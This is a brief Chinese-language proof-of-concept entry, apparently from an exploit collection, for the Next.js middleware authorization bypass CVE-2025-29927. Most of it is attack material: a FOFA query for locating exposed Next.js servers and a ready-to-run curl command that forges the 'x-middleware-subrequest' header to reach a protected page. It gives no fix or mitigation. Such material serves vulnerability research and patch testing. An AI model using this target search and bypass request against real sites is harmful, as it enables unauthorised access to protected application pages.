# Next中间件绕过漏洞(CVE-2025-29927)

Next.js 是一个用于构建全栈 Web 应用程序的 React 框架。在受影响的版本中，如果 Next.js 应用程序正在基于路径名的中间件中执行授权，则可能会绕过应用程序根目录下的页面的此授权，允许未经授权访问Next.js应用程序中的根级页面，这些页面本应受到授权检查的保护

## fofa
```javascript
app="NEXT.JS"
```

## poc
```javascript
curl -H "x-middleware-subrequest: middleware" http://10.10.72.67:3000/protected
```
![image](https://github.com/user-attachments/assets/2a39fd91-6b65-496a-b274-fee70dd9ca95)
![image](https://github.com/user-attachments/assets/36efa98c-cb6c-4fbc-b8a4-d42565ad9f28)

## 漏洞来源

- https://github.com/aydinnyunus/CVE-2025-29927